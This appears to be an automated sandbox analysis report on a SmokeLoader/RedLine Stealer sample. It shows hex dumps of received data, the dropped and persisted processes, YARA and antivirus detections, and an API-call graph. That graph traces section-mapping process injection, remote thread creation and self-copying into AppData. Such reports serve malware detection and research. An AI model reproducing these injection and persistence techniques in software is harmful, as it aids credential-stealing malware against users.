                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: 01 75 d8 44 8b c3 8b d7 48 8b cd 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5d 41 5c 5f e9 72 cb ff ff cc cc 48 83 ec 28 8b 41 6c 48 8b d1 85 c0 75 07 33 c0 48 83 c4 28 c3 83 c0 ff 78 2c 33 c9 39 4a 2c 7e 19 4c 8b 42 30 49 83 c0 04 41 39 00 74 0f 83 c1 01 49 83 c0 08 3b 4a 2c 7c ef 83 c9 ff 85 c9 78 1f 83 e8 01 79 d4 48 8d 15 43 ce 00 00 48 8d 4c 24 30 c7 44 24 30 01 00 00 00 e8 09 72 00 00 cc 48 63 c8 48 8b 42 70 48 8b 04 c8 eb a3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 8b 02 48 8b f1 48 8b fa 89 01 8b 42 04 48 83 c1 08 89 41 fc 33 c0 48 c7 41 18 01 00 00 00 89 41 08 89 41 0c 48 89 41 10 48 8d 05 a2 b4 00 00 48 89 01 e8 72 ca ff ff 48 8d 57 08 48 8d 4e 08 e8 45 fd ff ff 4c 8b 5f 28 48 8b 5c 24 30 4c 89 5e 28 48 8b c6 48 8b
                                                                                                                                            Data Ascii: uDHH\$@Hl$HHt$PH A]A\_rH(AlHu3H(x,39J,~LB0IA9tI;J,|xyHCHL$0D$0rHcHBpHH\$Ht$WH HHBHA3HAAAHAHHrHWHNEL_(H\$0L^(HH
                                                                                                                                            2024-10-04 17:18:16 UTC11546INData Raw: 64 24 60 44 89 b4 24 88 00 00 00 44 89 b4 24 8c 00 00 00 4c 89 b4 24 90 00 00 00 44 89 b4 24 a8 00 00 00 44 89 b4 24 ac 00 00 00 4c 89 b4 24 b0 00 00 00 48 c7 84 24 b8 00 00 00 04 00 00 00 4c 89 ac 24 a0 00 00 00 44 89 b4 24 c8 00 00 00 44 89 b4 24 cc 00 00 00 4c 89 b4 24 d0 00 00 00 44 88 b4 24 e4 00 00 00 e8 0e 32 00 00 49 3b c6 74 12 48 8d 54 24 60 48 8b c8 e8 94 fd ff ff 48 8b d8 eb 03 49 8b de 49 8b cf e8 14 8b ff ff 4d 63 5f 0c 49 8b 47 10 4a 89 1c d8 41 83 47 0c 01 48 8d 8c 24 c0 00 00 00 e8 9e 8b ff ff 48 8d 8c 24 a0 00 00 00 e8 91 8b ff ff 48 8d 8c 24 80 00 00 00 e8 84 8b ff ff 48 8d 4c 24 60 4c 89 64 24 60 e8 bd 8a ff ff 48 8d 4c 24 60 e8 6b 8b ff ff 4d 63 5f 0c 49 8b 57 10 4a 8b 54 da f8 48 8b cf e8 32 f9 ff ff 48 83 ed 01 b9 08 00 00 00 0f 85
                                                                                                                                            Data Ascii: d$`D$D$L$D$D$L$H$L$D$D$L$D$2I;tHT$`HHIIMc_IGJAGH$H$H$HL$`Ld$`HL$`kMc_IWJTH2H
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: 85 ff 74 17 0f b6 32 48 ff c2 0f b6 d8 33 f3 c1 e8 08 33 44 b5 00 48 ff cf eb e4 5f 5e 5d 5b c3 53 55 56 57 8b c1 49 8b f8 49 8b e9 48 85 ff 0f 84 ba 00 00 00 48 f7 c2 07 00 00 00 74 17 0f b6 32 48 ff c2 0f b6 d8 33 f3 c1 e8 08 33 44 b5 00 48 ff cf 75 e0 48 83 ff 10 0f 82 90 00 00 00 48 03 fa 4c 8b c7 48 83 ef 08 48 83 e7 f8 48 2b d7 33 04 3a 66 66 66 66 66 0f 1f 84 00 00 00 00 00 0f b6 c8 0f b6 dc c1 e8 10 0f b6 f4 25 ff 00 00 00 8b 8c 8d 00 0c 00 00 33 4c 3a 04 33 8c 9d 00 08 00 00 33 4c b5 00 33 8c 85 00 04 00 00 0f b6 c1 0f b6 dd c1 e9 10 0f b6 f5 81 e1 ff 00 00 00 8b 84 85 00 0c 00 00 33 44 3a 08 33 84 9d 00 08 00 00 33 44 b5 00 33 84 8d 00 04 00 00 48 83 c2 08 75 9d 33 04 3a 48 8b d7 49 8b f8 48 2b fa 48 85 ff 74 17 0f b6 32 48 ff c2 0f b6 d8 33 f3
                                                                                                                                            Data Ascii: t2H33DH_^][SUVWIIHHt2H33DHuHHLHHH+3:fffff%3L:33L33D:33D3Hu3:HIH+Ht2H3
                                                                                                                                            2024-10-04 17:18:16 UTC16320INData Raw: 20 54 19 00 20 34 18 00 20 01 14 00 19 e0 17 d0 15 c0 00 00 01 1d 0c 00 1d 74 15 00 1d 64 14 00 1d 54 13 00 1d 34 12 00 1d d2 19 e0 17 d0 15 c0 01 0c 04 00 0c 34 0a 00 0c 72 08 70 01 06 02 00 06 92 02 30 01 17 09 00 17 64 5e 00 17 54 5d 00 17 34 5c 00 17 01 5a 00 10 70 00 00 01 1a 06 00 1a 34 0f 00 1a 92 16 70 15 60 14 50 01 0d 05 00 0d 34 3c 00 0d 01 3a 00 06 70 00 00 01 17 09 00 17 64 1a 00 17 54 19 00 17 34 18 00 17 01 16 00 10 70 00 00 01 12 07 00 12 64 37 00 12 34 36 00 12 01 34 00 0b 70 00 00 01 0f 06 00 0f 54 13 00 0f 34 12 00 0f d2 0b 70 01 15 08 00 15 74 0f 00 15 64 0d 00 15 34 0c 00 15 92 11 c0 01 1c 0c 00 1c 64 0c 00 1c 54 0b 00 1c 34 0a 00 1c 32 18 f0 16 e0 14 d0 12 c0 10 70 01 0a 04 00 0a 34 0a 00 0a 72 06 70 01 1f 0d 00 1f 64 70 00 1f 54 6f
                                                                                                                                            Data Ascii: T 4 tdT44rp0d^T]4\Zp4p`P4<:pdT4pd7464pT4ptd4dT42p4rpdpTo


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:13:17:00
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\HaPJ2rPP6w.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\HaPJ2rPP6w.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:229'888 bytes
                                                                                                                                            MD5 hash:08E3912BD337BFF072BD1346DDC39F3A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:13:17:08
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:13:17:28
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\wideaec
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\wideaec
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:229'888 bytes
                                                                                                                                            MD5 hash:08E3912BD337BFF072BD1346DDC39F3A
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 34%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:13:18:03
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\C12E.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\C12E.exe
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:231'936 bytes
                                                                                                                                            MD5 hash:49A8BAC4600ABA0061CD216A4C75185C
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2348513596.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:13:18:16
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\89ED.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\89ED.exe
                                                                                                                                            Imagebase:0x140000000
                                                                                                                                            File size:2'021'096 bytes
                                                                                                                                            MD5 hash:FBFC7A6D58571AF46628818A232931A5
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:13:18:17
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\89ED.exe
                                                                                                                                            Wow64 process (32bit):
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\89ED.exe" -sfxelevation
                                                                                                                                            Imagebase:
                                                                                                                                            File size:2'021'096 bytes
                                                                                                                                            MD5 hash:FBFC7A6D58571AF46628818A232931A5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:13:18:33
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\bbdeaec
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\bbdeaec
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:231'936 bytes
                                                                                                                                            MD5 hash:49A8BAC4600ABA0061CD216A4C75185C
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000003.2690701719.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:13:20:01
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\bbdeaec
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\bbdeaec
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:231'936 bytes
                                                                                                                                            MD5 hash:49A8BAC4600ABA0061CD216A4C75185C
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:13:20:01
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\wideaec
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\wideaec
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:229'888 bytes
                                                                                                                                            MD5 hash:08E3912BD337BFF072BD1346DDC39F3A
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            Reset < >

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:9.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:28.2%
                                                                                                                                              Signature Coverage:42%
                                                                                                                                              Total number of Nodes:174
                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                              execution_graph 3409 402e40 3411 402e37 3409->3411 3412 402edf 3411->3412 3413 4018e6 3411->3413 3414 4018f5 3413->3414 3415 40192e Sleep 3414->3415 3416 401949 3415->3416 3418 40195a 3416->3418 3419 401514 3416->3419 3418->3412 3420 401524 3419->3420 3421 4015c4 NtDuplicateObject 3420->3421 3426 4016e0 3420->3426 3422 4015e1 NtCreateSection 3421->3422 3421->3426 3423 401661 NtCreateSection 3422->3423 3424 401607 NtMapViewOfSection 3422->3424 3425 40168d 3423->3425 3423->3426 3424->3423 3427 40162a NtMapViewOfSection 3424->3427 3425->3426 3428 401697 NtMapViewOfSection 3425->3428 3426->3418 3427->3423 3429 401648 3427->3429 3428->3426 3430 4016be NtMapViewOfSection 3428->3430 3429->3423 3430->3426 3599 401542 3600 40153b 3599->3600 3601 4015c4 NtDuplicateObject 3600->3601 3606 4016e0 3600->3606 3602 4015e1 NtCreateSection 3601->3602 3601->3606 3603 401661 NtCreateSection 3602->3603 3604 401607 NtMapViewOfSection 3602->3604 3605 40168d 3603->3605 3603->3606 3604->3603 3607 40162a NtMapViewOfSection 3604->3607 3605->3606 3608 401697 NtMapViewOfSection 3605->3608 3607->3603 3609 401648 3607->3609 3608->3606 3610 4016be NtMapViewOfSection 3608->3610 3609->3603 3610->3606 3569 416ae6 3570 416af0 LoadLibraryW 3569->3570 3579 4164d0 GetModuleHandleW GetProcAddress VirtualProtect 3570->3579 3573 416b1d 3574 416720 8 API calls 3573->3574 3575 416b22 3574->3575 3576 416b63 InterlockedDecrement 3575->3576 3577 416b43 MoveFileA 3575->3577 3578 416b79 3575->3578 3576->3575 3577->3575 3579->3573 3531 6b0001 3532 6b0005 3531->3532 3537 6b092b GetPEB 3532->3537 3534 6b0030 3539 6b003c 3534->3539 3538 6b0972 3537->3538 3538->3534 3540 6b0049 3539->3540 3541 6b0e0f 2 API calls 3540->3541 3542 6b0223 3541->3542 3543 6b0d90 GetPEB 3542->3543 3544 6b0238 VirtualAlloc 3543->3544 3545 6b0265 3544->3545 3546 6b02ce VirtualProtect 3545->3546 3548 6b030b 3546->3548 3547 6b0439 VirtualFree 3551 6b04be LoadLibraryA 3547->3551 3548->3547 3550 6b08c7 3551->3550 3556 6b0005 3557 6b092b GetPEB 3556->3557 3558 6b0030 3557->3558 3559 6b003c 7 API calls 3558->3559 3560 6b0038 3559->3560 3658 402dd0 3661 402ddc 3658->3661 3659 402edf 3660 4018e6 8 API calls 3660->3659 3661->3659 3661->3660 3431 416bf0 3434 4167c0 3431->3434 3433 416bf5 3435 4167cd 3434->3435 3436 4168cf InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 3435->3436 3441 4169df 3435->3441 3438 416917 7 API calls 3436->3438 3437 4169f0 SetCommState 3437->3441 3439 4169c0 3438->3439 3440 4169b4 ObjectPrivilegeAuditAlarmA 3438->3440 3443 4169d0 3439->3443 3444 4169c9 ReleaseMutex 3439->3444 3440->3439 3441->3437 3442 416a09 3441->3442 3445 416ac2 3442->3445 3446 416a16 8 API calls 3442->3446 3443->3441 3444->3443 3459 4164a0 LocalAlloc 3445->3459 3457 416a93 3446->3457 3450 416ac7 LoadLibraryW 3460 4164d0 GetModuleHandleW GetProcAddress VirtualProtect 3450->3460 3451 416b1d 3461 416720 3451->3461 3453 416b39 MoveFileA 3454 416b22 3453->3454 3454->3453 3455 416b63 InterlockedDecrement 3454->3455 3458 416b79 3454->3458 3455->3454 3457->3445 3458->3433 3459->3450 3460->3451 3462 416749 QueryDosDeviceA 3461->3462 3463 41675a 3461->3463 3462->3463 3472 416670 3463->3472 3466 416775 3475 4166b0 3466->3475 3467 41676d FreeEnvironmentStringsW 3467->3466 3470 41678c HeapDestroy GetNumaProcessorNode 3471 4167a3 3470->3471 3471->3454 3473 416681 FatalAppExitA GetModuleHandleW 3472->3473 3474 416693 3472->3474 3473->3474 3474->3466 3474->3467 3476 4166c3 BuildCommDCBA 3475->3476 3477 4166cf 3475->3477 3476->3477 3479 4166fb 3477->3479 3480 4166a0 3477->3480 3479->3470 3479->3471 3483 416620 3480->3483 3484 41664b 3483->3484 3485 41663c SetPriorityClass 3483->3485 3484->3477 3485->3484 3486 850d54 3489 850d63 3486->3489 3490 850d72 3489->3490 3493 851503 3490->3493 3494 85151e 3493->3494 3495 851527 CreateToolhelp32Snapshot 3494->3495 3496 851543 Module32First 3494->3496 3495->3494 3495->3496 3497 851552 3496->3497 3498 850d62 3496->3498 3500 8511c2 3497->3500 3501 8511ed 3500->3501 3502 8511fe VirtualAlloc 3501->3502 3503 851236 3501->3503 3502->3503 3503->3503 3580 4018f1 3581 4018f6 3580->3581 3582 40192e Sleep 3581->3582 3583 401949 3582->3583 3584 401514 7 API calls 3583->3584 3585 40195a 3583->3585 3584->3585 3645 401915 3646 4018c6 3645->3646 3647 40191a 3645->3647 3648 40192e Sleep 3647->3648 3649 401949 3648->3649 3650 401514 7 API calls 3649->3650 3651 40195a 3649->3651 3650->3651 3565 4166d7 3566 4166e0 3565->3566 3567 4166a0 SetPriorityClass 3566->3567 3568 4166fb 3566->3568 3567->3566 3504 6b003c 3505 6b0049 3504->3505 3517 6b0e0f SetErrorMode SetErrorMode 3505->3517 3510 6b0265 3511 6b02ce VirtualProtect 3510->3511 3513 6b030b 3511->3513 3512 6b0439 VirtualFree 3516 6b04be LoadLibraryA 3512->3516 3513->3512 3515 6b08c7 3516->3515 3518 6b0223 3517->3518 3519 6b0d90 3518->3519 3520 6b0dad 3519->3520 3521 6b0dbb GetPEB 3520->3521 3522 6b0238 VirtualAlloc 3520->3522 3521->3522 3522->3510 3523 402f97 3524 4030ee 3523->3524 3525 402fc1 3523->3525 3525->3524 3526 40307c RtlCreateUserThread NtTerminateProcess 3525->3526 3526->3524 3635 402d7b 3636 402d38 3635->3636 3636->3635 3637 402dc7 3636->3637 3638 4018e6 8 API calls 3636->3638 3638->3637 3586 4014fe 3587 401506 3586->3587 3588 401531 3586->3588 3589 4015c4 NtDuplicateObject 3588->3589 3594 4016e0 3588->3594 3590 4015e1 NtCreateSection 3589->3590 3589->3594 3591 401661 NtCreateSection 3590->3591 3592 401607 NtMapViewOfSection 3590->3592 3593 40168d 3591->3593 3591->3594 3592->3591 3595 40162a NtMapViewOfSection 3592->3595 3593->3594 3596 401697 NtMapViewOfSection 3593->3596 3595->3591 3597 401648 3595->3597 3596->3594 3598 4016be NtMapViewOfSection 3596->3598 3597->3591 3598->3594

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 4167c0-4167e8 2 4167f0-4167f7 0->2 3 416824-41682a 2->3 4 4167f9-416820 2->4 5 41682c-416838 3->5 6 41683e-416848 3->6 4->3 5->6 7 416883-41688a 6->7 8 41684a-416879 6->8 7->2 9 416890-416896 7->9 8->7 11 416898-41689e 9->11 12 4168a0-4168a6 11->12 13 4168ac-4168b3 11->13 12->13 14 4168b5 13->14 15 4168b9-4168c0 13->15 14->15 15->11 16 4168c2-4168c9 15->16 17 4169df-4169ed 16->17 18 4168cf-4169b2 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileA CreatePipe GetEnvironmentStringsW ReadConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 4169f0-4169fe SetCommState 17->19 22 4169c0-4169c7 18->22 23 4169b4-4169ba ObjectPrivilegeAuditAlarmA 18->23 24 416a00-416a07 19->24 25 416a09-416a10 19->25 26 4169d0-4169dc 22->26 27 4169c9-4169ca ReleaseMutex 22->27 23->22 24->19 24->25 28 416ac2-416ad1 call 4164a0 25->28 29 416a16-416abc GetConsoleAliasesLengthW GetComputerNameW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameW GetCommTimeouts 25->29 26->17 27->26 34 416ad3-416ae4 28->34 35 416b0d-416b18 LoadLibraryW call 4164d0 28->35 29->28 38 416af0-416b00 34->38 42 416b1d-416b2e call 416720 35->42 40 416b02 38->40 41 416b08-416b0b 38->41 40->41 41->35 41->38 46 416b30-416b37 42->46 48 416b39-416b47 MoveFileA 46->48 49 416b4d-416b53 46->49 48->49 51 416b55 call 4164c0 49->51 52 416b5a-416b61 49->52 51->52 54 416b70-416b77 52->54 55 416b63-416b6a InterlockedDecrement 52->55 54->46 58 416b79-416b89 54->58 55->54 60 416b90-416ba0 58->60 62 416ba2 60->62 63 416ba9-416bac 60->63 62->63 63->60 64 416bae-416bb9 63->64 65 416bc0-416bc5 64->65 66 416bc7-416bcd 65->66 67 416bcf-416bd5 65->67 66->67 68 416bd7-416be4 66->68 67->65 67->68
                                                                                                                                              APIs
                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004168DA
                                                                                                                                              • GetFocus.USER32 ref: 004168E0
                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004168ED
                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 004168F4
                                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 004168FC
                                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00416923
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041692C
                                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00416942
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00416948
                                                                                                                                              • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041698D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041699C
                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004169A5
                                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004169BA
                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004169CA
                                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 004169F4
                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00416A25
                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00416A39
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00416A40
                                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00416A46
                                                                                                                                              • GetBinaryType.KERNEL32(0041834C,?), ref: 00416A58
                                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00416A6B
                                                                                                                                              • GetLongPathNameW.KERNEL32(00418360,?,00000000), ref: 00416A7E
                                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00416A86
                                                                                                                                              • LoadLibraryW.KERNELBASE(00418374), ref: 00416B12
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1783476903.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_40b000_HaPJ2rPP6w.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 4079765171-956986773
                                                                                                                                              • Opcode ID: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
                                                                                                                                              • Instruction ID: 66b7ba66da8bb5d3bd80010fb135f4a1ed8397abbfee7ed1f5eca20cf58200d5
